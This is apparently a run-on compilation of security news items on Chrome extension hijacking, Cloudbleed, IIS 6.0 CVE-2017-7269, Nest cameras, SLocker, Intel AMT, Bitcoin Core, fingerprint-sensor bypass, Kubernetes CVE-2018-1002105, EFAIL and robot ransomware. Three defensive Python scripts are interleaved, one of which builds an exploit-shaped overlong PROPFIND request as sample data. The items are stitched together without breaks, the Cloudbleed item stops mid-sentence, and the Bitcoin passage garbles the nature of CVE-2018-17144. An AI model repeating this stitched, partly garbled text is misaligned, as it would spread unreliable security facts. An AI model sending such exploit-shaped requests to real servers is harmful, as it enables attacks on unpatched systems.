developers as a way of compromising Chrome extensions into spreading affiliate program ads that scare victims into paying for PC repairs. Proofpoint researcher Kafeine has identified six compromised Chrome extensions that were recently modified by an attacker after phishing a developer's Google Account credentials. Web Developer 0.4.9, Chrometana 1.1.3, Infinity New Tab 3.12.3, Copyfish 2.8.5, Web Paint 1.2.1, and Social Fixer 20.1.1 were compromised in late July and early August. Kafeine believes TouchVPN and Betternet VPN were also compromised in late June with the same technique. Developers of several of the extensions have removed the threat in recent updates to their affected apps, including Web Developer, Copyfish, Chrometana, and Social Fixer. The main intent of the attack on Chrome extension developers is to divert Chrome users to affiliate programs and switch out legitimate ads with malicious ones, ultimately to generate money for the attacker through referrals. The attackers have also been gathering credentials of users of Cloudflare, an availability service for website operators, which probably could be used in future attacks. The hijacked extensions were coded mostly to substitute banner ads on adult websites, but also on a range of other sites, and to steal traffic from legitimate ad networks. "In many cases, victims were presented with fake JavaScript alerts prompting them to repair their PC, then redirecting them to affiliate programs from which the threat actors could profit," notes Kafeine. At least one of the affiliate programs receiving the hijacked traffic promoted PCKeeper, a Windows-focused tool originally from ZeobitLLC, the maker of the MacKeeper security product that was the subject of a class action suit a few years ago over false security claims.

A snippet of JavaScript in the compromised extensions also downloaded a file served by Cloudflare containing a script designed to collect Cloudflare user credentials after login. Cloudflare stopped serving the file after it was alerted to the issue by Proofpoint. The phishing emails that compromised developers' Google Accounts purported to come from Google's Chrome Web Store team, which claimed the developer's extension didn't comply with its policies and would be removed unless the issue was fixed. As Bleeping Computer recently reported, Google's security team has sent an email warning to Chrome extension developers to be on the lookout for phishing attacks. The attackers had created a convincing copy of Google's real account login page. It's not the first time Chrome extensions have been targeted to spread adware and promote affiliate networks. In 2014, adware firms bought several popular Chrome extensions from legitimate developers, which up to that point had maintained trustworthy products.
Bad as Cloudbleed is, there's no evidence attackers exploited it before the patch was deployed. But since the vulnerability was triggered more than 1.2m times from 6,500 sites, Cloudflare is taking no chances: the company has tapped an outside company, Veracode, to scour its code. CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation. That update includes a synopsis of how the vulnerability was created and who faced the most risk. He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory: "We've successfully removed more than 80,000 unique cached pages. That underestimates the total number because we've requested search engines purge and re-crawl entire sites in some instances." Cloudbleed is a serious vulnerability in Cloudflare's internet infrastructure that Google Project Zero researcher Tavis Ormandy discovered in mid-February. It turned out that a single character in Cloudflare's code caused the problem. In its initial blog post on the matter, Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html. In his update, Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare's network
In a disclosure on March 27 that included their own simple Python proof-of-concept, the researchers outlined the "buffer overflow in the ScStoragePathFromUrl function in the WebDAV service" that occurs when an attacker sends an overlong IF header as part of a PROPFIND request (if that sounds obscure you can read about WebDAV here). Designated CVE-2017-7269, that's bad news, but the fact that it has been known about for months – with new exploits now likely – is the main takeaway. Given that IIS 6.0 shipped with Windows Server 2003 R2 in 2005 and Microsoft stopped supporting it after the end-of-life deadline passed in July 2015 (i.e. no more patches), one might assume that the install base is small. More likely, this is another version of the Windows XP situation where organisations find it hard to wean themselves off core software and end up putting themselves at risk. In 2015, research from analysts RiskIQ found 2,675 installs of IIS 6.0 inside 24 of the top FTSE-100 UK companies alone. Incredibly, the same analysis found 417 installs of IIS 5.0 in the same companies, which at that time was a year beyond extended support death. Shodan estimates 600,000 machines still visibly running this software globally, perhaps 10% of which have the PROPFIND extension running, according to an analysis by one enterprising researcher. Nobody knows, but with Microsoft unlikely to step in with a fix, it could be more than enough to cause problems. The premium fix is to stop using IIS 6.0 immediately, but for anyone who finds that difficult there is one hope: guerrilla patching.

We discussed this phenomenon in our recent coverage of Google's "Operation Rosehub", but it can be summed up by the simple idea that if the vendor in whose software a vulnerability has arisen can't or won't fix the issue, then someone else does it for them. A company called Acros Security dubbed this the "0patch" and, lo and behold, has come up with a "micro-patch" for CVE-2017-7269. We can't vouch for this, but Acros explains how it developed the patch in some detail for anyone staring down the barrel of limited options. What the latest episode challenges is the fixed idea of software lifecycles according to big software vendors, which runs something like "we've told them in advance that support will be removed by a given date, so if they don't follow our advice and upgrade then that's their lookout". The near debacle of XP's zombie afterlife was an example of this MO running aground on the rocks of business reality, beside which the latest IIS 6.0 event might look modest. But an unpatchable zero-day affecting hundreds of thousands of compromised web servers won't be fun for anyone – Microsoft included.
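For operators who cannot retire IIS 6.0 yet, the one observable the article gives is the shape of the request: a PROPFIND carrying an overlong If header. The following is an added detection example, not code from the article, the researchers or any vendor: it parses raw HTTP request heads, flags PROPFIND requests whose If header exceeds a length threshold, and reports any other PROPFIND for review. The three sample requests are constructed, and the 1000-byte threshold is an assumption (a legitimate WebDAV If header holds a few lock tokens or ETags and stays far below it); tune it for your environment.

```python
"""Flag PROPFIND requests with an overlong If header (the CVE-2017-7269 pattern).

Added example, not from the article or the researchers it cites. The request
samples below are constructed; IF_HEADER_MAX_LEN is an assumed threshold.
"""
import re

# Assumption: legitimate WebDAV 'If:' headers carry a handful of lock tokens
# or ETags and stay well below this size.
IF_HEADER_MAX_LEN = 1000

REQUEST_LINE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/\d\.\d$")


def parse_request(raw: str):
    """Split a raw HTTP request head into (method, target, headers).

    Header names are lower-cased; repeated headers are joined with ', '
    as RFC 7230 permits, so a split If header is still measured whole."""
    lines = raw.strip("\r\n").split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError(f"bad request line: {lines[0]!r}")
    method, target = m.group(1), m.group(2)
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the head
            break
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return method, target, headers


def classify(raw: str) -> str:
    """Return 'alert', 'info' or 'ok' for one request head."""
    method, _target, headers = parse_request(raw)
    if method != "PROPFIND":
        return "ok"
    if len(headers.get("if", "")) > IF_HEADER_MAX_LEN:
        return "alert"   # overlong If header on PROPFIND: the CVE-2017-7269 shape
    return "info"        # PROPFIND seen; notable if WebDAV is not expected here


def scan(samples: dict) -> dict:
    """Classify a name -> raw request mapping."""
    return {name: classify(raw) for name, raw in samples.items()}


# Constructed sample traffic (not captured from any real system)
SAMPLES = {
    "get": "GET /index.htm HTTP/1.1\r\nHost: legacy.example\r\n\r\n",
    "propfind_small": (
        "PROPFIND /share/ HTTP/1.1\r\nHost: legacy.example\r\nDepth: 1\r\n"
        "If: <http://legacy.example/share/> (<opaquelocktoken:abc-123>)\r\n\r\n"
    ),
    "propfind_long": (
        "PROPFIND /share/ HTTP/1.1\r\nHost: legacy.example\r\n"
        "If: <http://legacy.example/" + "A" * 1500 + ">\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:15s} {verdict}")
```

In practice the request heads would come from a reverse proxy or IDS capture in front of the legacy host; the "info" verdict exists because on a server that is not meant to serve WebDAV, any PROPFIND at all is worth a look.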
Google Nest's Dropcam, Dropcam Pro, Nest Cam Outdoor and Nest Cam Indoor security cameras can be easily disabled by an attacker within their Bluetooth range, a security researcher has found. The vulnerabilities are present in the latest firmware version running on the devices (v5.2.1). They were discovered by researcher Jason Doyle last fall, and their existence responsibly disclosed to Google, but they have still not been patched. The first two flaws can be triggered, leading to a buffer overflow condition, if the attacker sends the camera a too-long Wi-Fi SSID parameter or a too-long encrypted password parameter, respectively. That's easy to do, as Bluetooth is never disabled after the initial setup of the cameras, and attackers (e.g. burglars) can usually come close enough to them to perform the attack. Triggering one of these flaws will make the devices crash and reboot. The third flaw is a bit more serious, as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to. If that particular SSID does not exist, the camera drops its attempt to associate with it and returns to the original Wi-Fi network, but the whole process can last from 60 to 90 seconds, during which the camera won't be recording. Unfortunately, Bluetooth can't be disabled on these cameras, so there is little users can do to minimize this particular risk. Nest has apparently already prepared a patch but hasn't pushed it out yet. It is supposedly scheduled to be released soon, but no definite date has been offered.
A ransomware threat called SLocker, which accounted for one-fifth of Android malware attacks in 2015, is back with a vengeance, according to security firm Wandera. SLocker encrypts images, documents and videos on Android devices and demands a ransom to decrypt the files. Once the malware is executed, it runs in the background of a user's device without their knowledge or consent. Once it has encrypted files on the phone, the malware hijacks the device, blocking the user's access, and attempts to intimidate them into paying a ransom to unlock it. Last year, security company Bitdefender said that ransomware was the largest malware risk to Android users in the second half of 2015, with SLocker accounting for 22 per cent of Android malware threats in the UK in that period. The malware also topped the ransomware charts in Germany and Australia, and Bitdefender claimed that 44 per cent of the Android users it asked had already paid out a ransom in order to regain access to their devices. The malware continued to cause problems and, in mid-2016, its attacks were estimated to have resulted in tens of millions of dollars in ransoms paid. Weeks after the initial wave of attacks, security companies patched the issue for their enterprise customers, devices were updated and the threat disappeared. That is, until now. Mobile security firm Wandera said that its mobile intelligence engine MI:RIAM had detected more than 400 variants of the same malware. It said that these strains were targeting businesses' mobile fleets through easily accessible third-party app stores and websites where security checks are not as rigorous as they ought to be. According to Wandera, the variants have been redesigned and repackaged to avoid all known detection techniques.

"They utilise a wide variety of disguises including altered icons, package names, resources and executable files in order to evade signature-based detection," the company said. Third-party app stores and unknown vendors should be avoided by Android users, while corporate administrators should be wary of SLocker returning and put in place security measures to monitor devices accordingly.
Google has announced a crackdown on intrusive pop-up advertisements in its Chrome web browser after a previous update failed to stop them. The ads open users up to phishing attacks that attempt to scam people into giving private information such as bank details to online fraudsters. Google says the ads create an "abusive experience for users", including fee messages, unexpected clicks, phishing attempts and misleading site behaviour. The firm tried to stop manipulative adverts in an update last February but now admits that it "did not go far enough". Chrome currently has an option to enable a pop-up blocker, but fraudsters have quickly found ways around this. The company declined to name the companies involved in the crackdown but said that the update will block ads from a "small number of sites with persistent abusive problems". Pop-ups are small windows that tend to show system warnings which are difficult to close, as well as "watch video" buttons. When the company announced its previous crackdown back in February, critics were quick to point out that the firm wanted to make ads more tolerable so that its own could get past filters. Some said that the aim was to persuade people to disable their ad blockers so as not to prevent publishers (including Google) from displaying their advertisements, which would deprive them of revenue. Although they did not go into detail about why the previous block didn't work, Chrome product manager Vivek Sekhar said: "We've learned since then that this approach did not go far enough. In fact, more than half of these abusive experiences are not blocked by our current set of protections, and nearly all involve harmful or misleading ads."

Advertisements also tend to be a hotbed for malicious software or scams where fraudsters trick people into giving out their personal information. Once a pop-up is clicked on, the ad can take you to a separate web page asking you to download an application, and actually triggers an onslaught of more pop-up ads.
A Warwick company's managing director is warning other businesses to protect themselves from cyber criminals after being held to ransom. Kettell Video Productions was targeted by tech scammers who infected its IT systems with viruses before demanding £1,000 in the online currency Bitcoin or the files would be permanently deleted. Luckily, owner Stuart Kettell routinely backs up all his company's systems so nothing was lost, but he warned others to do the same to avoid disaster. "It was scary: I had no idea about cyber-attacks before and really didn't know what to do," he said. "Critical files, including images and videos for clients, were wiped out along with a lifetime of personal memories. The affected files were lost for good – the only way to recover them was with the key code held by the blackmailer – but luckily I back up everything to an external data cartridge. In the end it was more an inconvenience… but it could have threatened the business. I would strongly urge all business owners to back up their essential files." Mr Kettell acted quickly when he realised the audio-visual specialists in Arlescote Close were under attack by the web sharks in December 2015. "I noticed all my photos, videos and pdf files ghosting to white with a new filename… it attacked my desktop first, then it wormed its way into folders one file at a time every few seconds," he said. "I've no idea how the malware was introduced as we use software that's designed to prevent against such attacks. And the demand for payment seemed very professional: I was given links where I could buy Bitcoins and even offered the chance to decrypt one file for free. I unplugged my computer, isolated it from the internet, and ran some anti-malware software to stop the virus spreading further."

Latest figures from the Crime Survey for England & Wales estimated there were 1.3m computer virus offences and 667,000 hacking-related offences committed in the year ending September 2016. Sergeant Gary Sirrell from the cybercrime team at West Midlands Regional Organised Crime Unit said commercial web attacks are increasingly being committed against smaller firms and not big multinationals. "Small and medium sized companies are easier targets: they often don't have the resources or expertise to protect against cyberattacks," he said. "And if they are targeted, the impact can be devastating. But there are steps business owners can take to mitigate the risk. A really effective tactic involves 'layering' defences to include a firewall, anti-malware software, staff training (and regular re-training) around phishing email awareness, and finally to plug any holes in your defences by applying software patches and updates in a timely manner. By exercising good cyber hygiene, and having a strong backup policy, Stuart avoided the dilemma of whether to see his business significantly damaged, or to have to hand over a ransom to organised crime gangs to get his data unlocked. If more businesses in the West Midlands proactively took such steps there would be significantly fewer crime victims."
Last week, Intel revealed that a serious security flaw in some of its chips left potentially thousands of devices vulnerable to attackers. Then, security researchers revealed the problem was far worse than anyone initially thought, as the vulnerability could allow attackers to remotely "hijack" affected machines. It's still not clear just how many devices are impacted, as Intel hasn't said, but some in the industry have put the number as high as 8,000. Here's a look at what you need to know and how to protect yourself. The vulnerability stems from Intel Active Management Technology (AMT), a technology that allows devices to be remotely managed, making it easier to update software and perform maintenance remotely. It's a feature typically used by businesses that may be responsible for many devices that may not all be in the same place. Since the technology is integrated at the chip level, AMT can do a bit more than other software-enabled management tools. Using AMT's capabilities, for instance, a system administrator could remotely access and control a computer's mouse and keyboard, or turn on a computer that's already been powered down. While those can be helpful capabilities for corporate IT departments to have, it's obviously the type of access you'd want locked down pretty tightly. And that's just the problem. Security researchers found that AMT's web portal can be accessed with just the user "admin" and literally any password, or even no password at all. That's why some have labeled it a "hijacking" flaw, since anyone who exploits the vulnerability would be able to remotely control so many processes. Most importantly, the flaw doesn't impact every Intel chip out there.

Since it's rooted in AMT, the vulnerability primarily affects businesses, though, as Intel points out, some consumers use computers made for businesses. One of the easiest ways to check if you might be affected is to look at the Intel sticker that comes on so many PCs: a "vPro" logo indicates the presence of AMT. Of course, looking for a sticker is hardly foolproof. Intel has also released a downloadable detection guide, which will walk you through the process of checking your machines. You can find the detection guide here. Though Intel has long supplied Apple with chips for Macs, AMT is only present on processors in Windows-based machines, so all Macs are safe from this particular exploit. If you do have a machine that's impacted by the security flaw, you'll need to update your firmware as soon as possible. Intel has already created a patch and is now waiting on manufacturers to make it available. Some, including Dell, Lenovo, HP, and Fujitsu, have already rolled it out. You can find links to those on Intel's website, which will be updated as more manufacturers release updates.
The Bitcoin Core team yesterday released a patch for a DDoS vulnerability that could prove fatal to the Bitcoin network. The patch note urged miners to shut down their older versions urgently and replace them with the new version, Bitcoin Core 0.16.3. The announcement, first reported on Hacked, revealed that all the recent Bitcoin Core versions could be vulnerable to a Distributed Denial-of-Service attack. An attack of this kind typically involves multiple compromised systems flooding a single system (or network), similar to zombies encircling an uninfected person and disabling his movements. DDoS perpetrators could attack a Bitcoin network either by flooding the block with duplicate transactions, thus jamming the transaction confirmation of other people, or by flooding the nodes on Bitcoin's peer-to-peer network, thus over-utilizing the bandwidth through malicious transaction relays. The recent DDoS vulnerability, termed CVE-2018-17144, attempted the latter: flooding full node operators with traffic. Hacked reports: "The way the potential exploit could work was by allowing anyone who was capable of mining a sufficient number of proof of work blocks to crash Bitcoin Cores running software versions 0.14.0 to 0.16.2." It also means that the miners who occasionally run Bitcoin Core were not vulnerable to the attack. Still, developers recommended that all miners go ahead with the latest update to stay safe. Also, the patch fixed some other minor bugs related to consensus, RPC, invalid flag errors, and documentation.

It is worth noting that Bitcoin is not the only cryptocurrency on the DDoS attackers' hit list. Flaws have been found in other cryptocurrency clients as well, including Bitcoin Cash and Ethereum. An effective attack on the Ethereum network lasted more than a month and created millions of dead accounts. In response, developers had to go through two on-chain forks and one off-chain process to clean up the mess. In another DDoS attack that slowed down the Ethereum network, miners had to increase gas fees to repel the attackers. There was no consensus failure. DDoS continues to be a global problem that impacts all spheres of the internet. Europol in its latest investigative report noted: "Criminals continue to use Distributed-Denial-of-Service (DDoS) attacks as a tool against private business and the public sector. Such attacks are used not only for financial gains but for ideological, political or purely malicious reasons. This type of attack is not only one of the most frequent (second only to malware in 2017); it is also becoming more accessible, low-cost and low-risk." Meanwhile, decentralized networks like Bitcoin are still more secure against such attacks purely because single entities would not be able to bring them down. Also, because the people involved, including the attackers themselves, are heavily invested in Bitcoin, a coordinated attack would only cost them their own bitcoin validation commissions.
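The practical question for a node operator is which of their Bitcoin Core builds sit inside the 0.14.0 to 0.16.2 window the article quotes and still need the 0.16.3 update. The following is an added example, not code from the article, Hacked or the Bitcoin Core project: it parses the version strings operators typically record (with or without a leading "v", and the two-part short form) and triages a constructed node inventory against the range the article names.

```python
"""Triage Bitcoin Core versions against the CVE-2018-17144 affected range.

Added example, not from the article or the Bitcoin Core project. The affected
range (0.14.0 through 0.16.2) and fixed release (0.16.3) are the versions the
article names; the node inventory below is constructed.
"""
import re
from typing import Dict, Tuple

AFFECTED_LOW = (0, 14, 0)
AFFECTED_HIGH = (0, 16, 2)
FIXED = (0, 16, 3)

# Accepts "0.16.3", "v0.16.3" and the short form "0.16" (read as 0.16.0).
_VERSION = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn a version string into a comparable (major, minor, patch) tuple."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Bitcoin Core version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(text: str) -> bool:
    """True when the version lies inside the range the article gives."""
    return AFFECTED_LOW <= parse_version(text) <= AFFECTED_HIGH


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map node name -> 'upgrade' (in range), 'patched' (0.16.3 or later)
    or 'older' (before 0.14.0, outside the range the article describes)."""
    result = {}
    for node, ver in inventory.items():
        if is_affected(ver):
            result[node] = "upgrade"
        elif parse_version(ver) >= FIXED:
            result[node] = "patched"
        else:
            result[node] = "older"
    return result


# Constructed inventory: node name -> version string the node reports
NODES = {
    "node-a": "v0.16.2",
    "node-b": "0.16.3",
    "node-c": "0.14.0",
    "node-d": "0.13.2",
    "node-e": "0.16",
}

if __name__ == "__main__":
    for node, verdict in triage(NODES).items():
        print(f"{node}: {NODES[node]:>8} -> {verdict}")
```

The "older" verdict is deliberately separate from "patched": a pre-0.14.0 build is outside the range the article quotes, but it is still unsupported software and not something to leave in place on that basis.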
Microsoft has seen its share of issues as of late, and now a seemingly simple patch is causing serious issues for certain laptops running the 2016 Anniversary Update. The update was originally released to prevent a zero-day attack on IE. Per Microsoft, this was the issue being fixed: "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email. The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory." But now that fix is causing a pretty big problem of its own: it's preventing certain laptops from booting. The affected machines are part of a pretty small bunch—only Lenovo laptops with less than 8 GB of RAM running the 2016 Anniversary Update (1607)—but it's still a pretty bad problem to have.

Fortunately, there's a way to bypass the failed boot by restarting into the UEFI and disabling Secure Boot. It's also noted that if BitLocker is enabled, you may have to go through BitLocker recovery after disabling Secure Boot. On the upside, Microsoft is working with Lenovo to correct the issue and will release a fix sometime in the future. I just wouldn't count on it before the end of the year. Until then, be careful when updating devices, especially if they happen to be Lenovo laptops with limited RAM.
A design flaw affecting all in-display fingerprint sensors, which left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack, has been quietly patched. The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication. In-display fingerprint reader technology is widely considered an up-and-coming feature to be used in a number of flagship model phones introduced in 2019 by top OEM phone makers, according to Tencent's Xuanwu Lab, which is credited with first identifying the flaw earlier this year. "During our research on this, we found all the in-display fingerprint sensor modules suffer the same problem no matter where they were manufactured or by which vendor," said Yang Yu, a researcher at Xuanwu Lab. "This vulnerability is a design fault of in-display fingerprint sensors." Impacted are all phones tested in the first half of 2018 that had in-display fingerprint sensors, said Yu. That includes current models of Huawei Technologies' Porsche Design Mate RS and Mate 20 Pro phones. Yu said that many more cellphone manufacturers are impacted by the issue. However, Yu would not specify other impacted vendors or models: "Vendors differ greatly in their attitude to security issues; some have open attitudes, like Huawei, and in contrast, some vendors strongly hope we keep the voice down on this," he told Threatpost. He noted Huawei has been forthcoming, issuing patches to address the issue. Other phones that use the feature include Vivo Communication Technology's V11 Pro, X21 and Nex; OnePlus' 6T; and Xiaomi's Mi 8 Explorer Edition.

Vivo, OnePlus and Xiaomi did not respond to requests for comment from Threatpost. In-display fingerprint readers based on optical fingerprint imaging, experts believe, will soon replace conventional authentication based on capacitance-sensor fingerprint scanners. In-display readers allow a user to place a finger on the screen of a smartphone, where a scanner behind the display can verify the fingerprint, authenticate the user and unlock the phone. Design-wise, the feature allows phones to be sleeker and less cluttered, supporting infinity displays. Usability advantages include the ability to unlock the phone simply by placing your finger on the phone's screen at any angle, whether it's sitting on a table or in a car mount. The vulnerability, for which Huawei issued a patch (CVE-2018-7929) in September, can be exploited in a matter of seconds, researchers said. In an exclusive interview with Threatpost on the flaw, Yu said all an attacker needs to carry out the attack is an opaque reflective material such as aluminum foil. By placing the reflective material over a residual fingerprint on the phone's display, the capacitance fingerprint imaging mechanism can be tricked into authenticating a fingerprint.
One of the most visible transfers of executive power happened today on Twitter. The official @POTUS account was handed off to President Trump, and former President Obama re-assumed his personal handle, @BarackObama. (Trump predictably continued to tweet from his personal account long into the inauguration, however.) "Michelle and I are off on a quick vacation, then we'll get back to work." But some Twitter users are complaining that despite never following @POTUS in the first place, the presidential handle is suddenly showing up in their timelines. Somehow, they claim, Twitter had automatically followed it for them. "I specifically UNFOLLOWED this account earlier today. Yet now I am following it again without having resubscribed," one user tweeted. "@POTUS turned up in my feed despite me not following, willingly or otherwise," said another person. A spokesperson for Twitter told Motherboard they couldn't comment on these specific claims, but said that post-inauguration, Twitter automatically migrated the followers of @POTUS over to the newly created @POTUS44 account, which acts as an archive for President Obama's tweets. The same was done for @FLOTUS44, belonging to Michelle Obama, and @VP44, belonging to former Vice President Biden. As you can see, both versions have somewhat similar follower counts.

Approximately 560,000 people were affected by a flaw in the script used to migrate followers to the new archival handles. "If you were following @POTUS before 12pET, by end of day you'd be following *two* accounts: @POTUS44 (44th Admin) and @POTUS (45th Admin)," Dorsey tweeted. Dorsey apologized for the mistake, and said Twitter has worked to correct the issue. He did add, however, that the Obama Administration felt it was fair to automatically migrate followers after the transition, since @POTUS is an institutional account.
A critical vulnerability in Kubernetes, the open-source system for managing containerized applications, can enable an attacker to gain full administrator privileges on Kubernetes compute nodes. Kubernetes makes it easier to manage a container environment by organizing application containers into pods, nodes (physical or virtual machines) and clusters. Multiple nodes form a cluster, managed by a master that coordinates cluster-related activities such as scaling, scheduling, or updating apps. Each node has an agent called the kubelet that communicates with the Kubernetes master via the API. The number of nodes in a Kubernetes system can run to hundreds or even thousands. The flaw lies in how the API server proxies connection-upgrade requests to backend servers such as kubelets and aggregated API servers: a crafted request that the backend rejects leaves the proxied connection open, and further requests sent over it reach the backend authenticated with the API server's own TLS credentials. Pulling this off is easy on default configurations, where "all users (authenticated and unauthenticated) are allowed to perform discovery API calls that allow this escalation," says Jordan Liggitt, staff software engineer at Google. The security bug was discovered by Darren Shepherd, co-founder of Rancher Labs, the company behind the Kubernetes-as-a-Service solution Rancher. Now tracked as CVE-2018-1002105, the flaw is rated critical, with a Common Vulnerability Scoring System (CVSS) score of 9.8 out of 10. According to the latest version of the vulnerability severity calculator, exploiting the bug is low in attack complexity and does not require user interaction. Red Hat's OpenShift Container Platform, which uses Kubernetes for orchestrating and managing containers, is also impacted by the vulnerability. In an advisory on the matter, the company explains that the flaw can be used in two ways against its products.
One involves a normal user with 'exec', 'attach', or 'portforward' rights over a Kubernetes pod (a group of one or more containers that share storage and network resources); they can escalate their privileges to cluster-admin level and execute any process in a container. The second attack method exploits the API extension feature used by 'metrics-server' and 'servicecatalog' in OpenShift Container Platform, OpenShift Online, and OpenShift Dedicated. No privileges are required: an unauthenticated user can get admin rights to any API extension deployed to the cluster. "Cluster-admin access to 'servicecatalog' allows creation of service brokers in any namespace and on any node," the advisory details. The problem has been addressed in the latest Kubernetes revisions: v1.10.11, v1.11.5, v1.12.3, and v1.13.0-rc.1. Kubernetes releases prior to these, along with the products and services based on them, are affected by CVE-2018-1002105. Red Hat released patches for the OpenShift family of containerization software (OpenShift Container Platform, OpenShift Online, and OpenShift Dedicated), and users have received service updates they can install at their earliest convenience. The software company warns that a malicious actor could exploit the vulnerability to steal data or inject malicious code, as well as "bring down production applications and services from within an organization's firewall."
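The first thing a practitioner wants after reading the fixed-version list above is a check that maps a reported API server version onto "patched or not", including the awkward cases (a pre-release of the fixing patch level, a distribution build suffix, an old minor that never got a fix). The following is an added example written for this page, not code from Kubernetes or Red Hat; the fixed versions are exactly the ones named above, and the assumption that the version string comes from the gitVersion field of kubectl version -o json is mine.

```python
"""Decide whether a Kubernetes version carries the fix for CVE-2018-1002105.

Added example, not code from Kubernetes or Red Hat. The fixed versions are the
ones named above: v1.10.11, v1.11.5, v1.12.3 and v1.13.0-rc.1 (so every 1.13
release). Anything older, including every 1.9.x and earlier release, is
treated as vulnerable. Feed it the serverVersion.gitVersion value from
'kubectl version -o json' (assumption about where your tooling reads it).
"""
import re

FIRST_FIXED_PATCH = {10: 11, 11: 5, 12: 3}   # minor -> first patched patch level
FIRST_FIXED_MINOR = 13                       # 1.13.0-rc.1 and later are fixed

_VER_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.\-]+))?")


def parse_version(version):
    """Return (major, minor, patch, prerelease) for strings such as 'v1.12.3'
    or 'v1.13.0-rc.1'. Build metadata after '+' (e.g. '+coreos.0') is ignored."""
    m = _VER_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised Kubernetes version: %r" % version)
    major, minor, patch, pre = m.groups()
    return int(major), int(minor), int(patch), pre


def is_vulnerable(version):
    """True if this API server version predates its CVE-2018-1002105 fix."""
    major, minor, patch, pre = parse_version(version)
    if major != 1:
        return major < 1                 # 0.x predates the fix; 2.x would postdate it
    if minor >= FIRST_FIXED_MINOR:
        return False
    if minor not in FIRST_FIXED_PATCH:
        return True                      # 1.9 and older never received a fix
    fixed = FIRST_FIXED_PATCH[minor]
    if patch != fixed:
        return patch < fixed
    # A pre-release of the fixing patch level (e.g. v1.12.3-beta.0) predates
    # the fix; the final release does not.
    return pre is not None


def audit(versions):
    """Map component name -> version string to the sorted list of vulnerable
    components. The sample input in __main__ is constructed."""
    return sorted(name for name, ver in versions.items() if is_vulnerable(ver))


if __name__ == "__main__":
    sample = {"prod-apiserver": "v1.11.4", "staging-apiserver": "v1.12.3",
              "lab-apiserver": "v1.13.0-rc.1"}
    print(audit(sample))                 # ['prod-apiserver']
```

The pre-release rule matters in practice: a cluster reporting v1.12.3-beta.0 looks patched to a naive string comparison but was cut before the fix landed in the 1.12.3 release.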
Enigmail and GPG Tools have been patched for EFAIL. For more up-to-date information, please see EFF's Surveillance Self-Defense guides.

Don't panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now. A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim's own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days. Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause their use of the tool and seek other modes of secure end-to-end communication for now. Because we are awaiting the response from the security community to the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now. Sending PGP-encrypted emails to an unpatched client will also create adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers.
While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn't important whether the sender or the receiver of the original secret message is targeted, because a PGP message is encrypted to both of their keys. At EFF, we have relied on PGP extensively, both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email. Our recommendations may change as new information becomes available, and we will update this post when that happens.
Researchers found they were able to infect robots with ransomware; in the real world, such attacks could be highly damaging to businesses if robot security isn't addressed. Ransomware has long been a headache for PC and smartphone users, but in the future it could be robots that stop working unless a ransom is paid. Researchers at security company IOActive have shown how they managed to hack the humanoid NAO robot made by Softbank and infect it with custom-built ransomware. The researchers said the same attack would work on the Pepper robot too. After the infection, the robot is shown insulting its audience and demanding to be 'fed' bitcoin cryptocurrency in order to restore its systems to normal. While a tiny robot making threats might initially seem amusing, if a little creepy, the proof-of-concept attack demonstrates the risks associated with a lack of security in robots and how organisations that employ robots could suddenly see parts of their business grind to a halt should they become a victim of ransomware. "In order to get a business owner to pay a ransom to a hacker, you could make robots stop working. And, because the robots are directly tied to production and services, when they stop working they'll cause a financial problem for the owner, losing money every second they're not working," Cesar Cerrudo, CTO at IOActive Labs, told ZDNet. Building on what was learned in previous studies of security vulnerabilities in robots, the researchers were able to inject and run code in Pepper and NAO robots and take complete control of the systems, giving them the option to shut the robot down or modify its actions. The researchers said it was possible for an attacker with access to the Wi-Fi network the robot is running on to inject malicious code into the machine.
